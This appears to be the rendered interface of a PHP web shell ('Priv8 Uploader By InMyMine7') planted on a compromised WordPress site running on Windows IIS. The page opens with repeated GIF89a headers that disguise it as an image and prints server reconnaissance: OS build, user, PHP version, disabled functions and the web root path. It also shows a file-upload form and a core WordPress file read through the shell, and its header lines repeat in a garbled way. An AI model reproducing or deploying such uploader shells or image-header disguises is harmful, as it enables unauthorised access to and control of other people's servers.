GIF89a;
GIF89a;Priv8 Uploader By InMyMine7
Windows NT 5KQS5 10.0 build 17763 (Windows Server 2016) AMD64
GIF89a;Priv8 Uploader By InMyMine7
Windows NT 5KQS5 10.0 build 17763 (Windows Server 2016) AMD64
Priv8 Uploader By InMyMine7
Windows NT 5KQS5 10.0 build 17763 (Windows Server 2016) AMD64
|
Server : Microsoft-IIS/10.0 System : Windows NT 5KQS5 10.0 build 17763 (Windows Server 2016) AMD64 User : 80.com ( 0) PHP Version : 7.4.33 Disable Function : passthru,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,popen,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,putenv,exec Directory : d:/wwwroot/80.com/wp-includes/ |
Upload File : |
<?php /** * Core class used for managing HTTP transports and making HTTP requests. * * This file is deprecated, use 'wp-includes/class-wp-http.php' instead. * * @deprecated 5.9.0 * @package WordPress */ _deprecated_file( basename( __FILE__ ), '5.9.0', WPINC . '/class-wp-http.php' ); /** WP_Http class */ require_once ABSPATH . WPINC . '/class-wp-http.php';